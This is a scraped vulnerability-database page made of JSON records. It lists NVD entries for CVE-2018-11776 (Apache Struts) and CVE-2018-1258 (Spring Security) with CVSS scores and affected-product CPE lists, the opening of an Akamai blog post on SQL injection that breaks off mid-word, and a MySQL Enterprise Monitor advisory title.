"cpe:2.3:a:apache:tomcat:8.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2023-12-01T14:36:38", "description": "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-22T13:29:00", "type": "cve", "title": "CVE-2018-11776", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-11-07T02:51:00", "cpe": ["cpe:/a:apache:struts:2.5.16", "cpe:/a:apache:struts:2.3.34"], "id": "CVE-2018-11776", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11776", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.16:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-01T14:41:38", "description": "Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-11T20:29:00", "type": "cve", "title": "CVE-2018-1258", "cwe": ["CWE-863"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1258"], "modified": "2022-04-11T17:18:00", "cpe": ["cpe:/a:oracle:enterprise_manager_for_mysql_database:13.2", "cpe:/a:oracle:retail_assortment_planning:14.1", "cpe:/a:oracle:retail_financial_integration:14.0", "cpe:/a:oracle:micros_lucas:2.9.5", "cpe:/a:netapp:storage_automation_store:-", "cpe:/a:oracle:retail_point-of-service:14.1", "cpe:/a:oracle:communications_network_integrity:7.3.6", "cpe:/a:oracle:enterprise_repository:12.1.3.0.0", "cpe:/a:oracle:goldengate_for_big_data:12.3.2.1", "cpe:/a:oracle:healthcare_master_person_index:4.0", "cpe:/a:oracle:insurance_policy_administration:10.0", "cpe:/a:oracle:retail_financial_integration:15.0", "cpe:/a:oracle:endeca_information_discovery_integrator:3.2.0", "cpe:/a:redhat:fuse:7.3.0", "cpe:/a:oracle:application_testing_suite:13.1.0.1", "cpe:/a:oracle:goldengate_for_big_data:12.2.0.1", "cpe:/a:oracle:application_testing_suite:10.1", "cpe:/a:oracle:retail_customer_insights:16.0", "cpe:/a:oracle:service_architecture_leveraging_tuxedo:12.1.3.0.0", "cpe:/a:oracle:service_architecture_leveraging_tuxedo:12.2.2.0.0", "cpe:/a:oracle:application_testing_suite:13.2.0.1", "cpe:/a:oracle:hospitality_guest_access:4.2.1", "cpe:/a:oracle:application_testing_suite:12.5.0.3", "cpe:/a:oracle:retail_assortment_planning:16.0", "cpe:/a:oracle:agile_plm:9.3.4", "cpe:/a:netapp:oncommand_workflow_automation:-", "cpe:/a:oracle:insurance_rules_palette:10.0", "cpe:/a:oracle:insurance_rules_palette:11.0", "cpe:/a:oracle:mysql_enterprise_monitor:8.0.2.8191", "cpe:/a:netapp:oncommand_unified_manager:*", "cpe:/a:netapp:snapcenter:-", "cpe:/a:oracle:retail_point-of-service:14.0", "cpe:/a:oracle:tape_library_acsls:8.4", "cpe:/a:oracle:endeca_information_discovery_integrator:3.1.0", "cpe:/a:oracle:retail_central_office:14.1", "cpe:/a:oracle:weblogic_server:10.3.6.0", "cpe:/a:oracle:retail_returns_management:14.0", "cpe:/a:oracle:agile_plm:9.3.3", "cpe:/a:oracle:enterprise_manager_ops_center:12.2.2", "cpe:/a:oracle:insurance_calculation_engine:10.2.1", "cpe:/a:oracle:retail_xstore_point_of_service:17.0", "cpe:/a:oracle:insurance_policy_administration:10.1", "cpe:/a:oracle:retail_financial_integration:16.0", "cpe:/a:netapp:oncommand_insight:-", "cpe:/a:oracle:weblogic_server:12.2.1.2", "cpe:/a:oracle:healthcare_master_person_index:3.0", "cpe:/a:oracle:retail_back_office:14.1", "cpe:/a:oracle:insurance_rules_palette:10.2", "cpe:/a:oracle:application_testing_suite:13.3.0.1", "cpe:/a:oracle:peoplesoft_enterprise_fin_install:9.2", "cpe:/a:oracle:retail_financial_integration:13.2", "cpe:/a:oracle:big_data_discovery:1.6.0", "cpe:/a:oracle:retail_central_office:14.0", "cpe:/a:oracle:retail_customer_insights:15.0", "cpe:/a:oracle:insurance_calculation_engine:10.2", "cpe:/a:oracle:insurance_rules_palette:11.1", "cpe:/a:oracle:hospitality_guest_access:4.2.0", "cpe:/a:oracle:retail_assortment_planning:15.0", "cpe:/a:oracle:insurance_rules_palette:10.1", "cpe:/a:oracle:enterprise_repository:11.1.1.7.0", "cpe:/a:oracle:health_sciences_information_manager:3.0", "cpe:/a:oracle:insurance_calculation_engine:10.1.1", "cpe:/a:oracle:weblogic_server:12.1.3.0", "cpe:/a:oracle:retail_back_office:14.0", "cpe:/a:oracle:retail_returns_management:14.1", "cpe:/a:oracle:retail_integration_bus:14.1.2", "cpe:/a:oracle:insurance_policy_administration:10.2", "cpe:/a:oracle:agile_plm:9.3.5", "cpe:/a:oracle:retail_financial_integration:14.1", "cpe:/a:oracle:goldengate_for_big_data:12.3.1.1", "cpe:/a:oracle:insurance_policy_administration:11.0", "cpe:/a:oracle:weblogic_server:12.2.1.3", "cpe:/a:oracle:enterprise_manager_ops_center:12.3.3", "cpe:/a:oracle:agile_plm:9.3.6"], "id": "CVE-2018-1258", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1258", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:goldengate_for_big_data:12.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_repository:11.1.1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:*:*:*:*:*:vsphere:*:*", "cpe:2.3:a:redhat:fuse:7.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:service_architecture_leveraging_tuxedo:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_point-of-service:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate_for_big_data:12.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_assortment_planning:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:big_data_discovery:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:14.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_assortment_planning:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:endeca_information_discovery_integrator:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_fin_install:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_assortment_planning:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate_for_big_data:12.3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:8.0.2.8191:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_repository:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_central_office:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:health_sciences_information_manager:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:*:*:*:*:*:windows:*:*", "cpe:2.3:a:oracle:service_architecture_leveraging_tuxedo:12.2.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:storage_automation_store:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_mysql_database:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_central_office:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:endeca_information_discovery_integrator:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:micros_lucas:2.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_point-of-service:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:tape_library_acsls:8.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:13.2:*:*:*:*:*:*:*"]}], "akamaiblog": [{"lastseen": "2020-09-09T13:53:38", "description": "SQL injections were first discovered in 1998, and over 20 years later, they remain an unsolved challenge and an ongoing threat for every web application and API. The Open Web Application Security Project (OWASP) highlighted injection flaws in its Top 10 lists for both [web application security risks](<https://owasp.org/www-project-top-ten/>) and [API security threats](<https://owasp.org/www-project-api-security/>). \n\nFor Akamai customers, SQL injections comprised 76% of all web application attacks detected over the past two years.\n\nThe reasons why SQL injections remain a challenge in 2020 are the same as those that have driven the growth of the World Wide Web ([and Akamai with it](<https://www.streamingmediablog.com/2020/08/akamai-milestone.html>)) over the past two decades:\n\n * There is more information online than ever before, including [information that has financial value](<https://content.akamai.com/PG2564-Weighing-Risk-Against-Data-Breach.html>), and is therefore a target for attackers\n * The number of web applications is rapidly growing, and Akamai customers often have hundreds of applications that collectively represent their digital experience\n * Web applications have become highly complex, with many different components and technologies; the first-party and open source code in apps pose growing vulnerabilities, as do the many connections between services -- all of which can be exploited at any weak point\n * Developers don't always think about security, and security teams aren't able to keep up with the increasing number of complex applications they're chartered to protect\n\nAll of these factors contribute to security teams having difficulty keeping security up to date in constantly changing apps. But that's only half of the equation. Rapid iteration also creates a steady stream of possible new vulnerabilities and attack vectors designed to exploit them.\n\n### DDoS Protection Starts with Zero-Second Mitigation\n\nMost customers start their [web application and API protection (WAAP)](<https://www.gartner.com/en/documents/3903064/defining-cloud-web-application-and-api-protection-servic>) journey with distributed denial-of-service (DDo

MySQL Enterprise Monitor 3.4.x &lt; 3.4.10 / 4.x &lt; 4.0.7 / 8.x &lt; 8.0.3 Multiple Vulnerabilities (Oct 2018 CPU)

Description

Related

MySQL Enterprise Monitor 3.4.x < 3.4.10 / 4.x < 4.0.7 / 8.x < 8.0.3 Multiple Vulnerabilities (Oct 2018 CPU)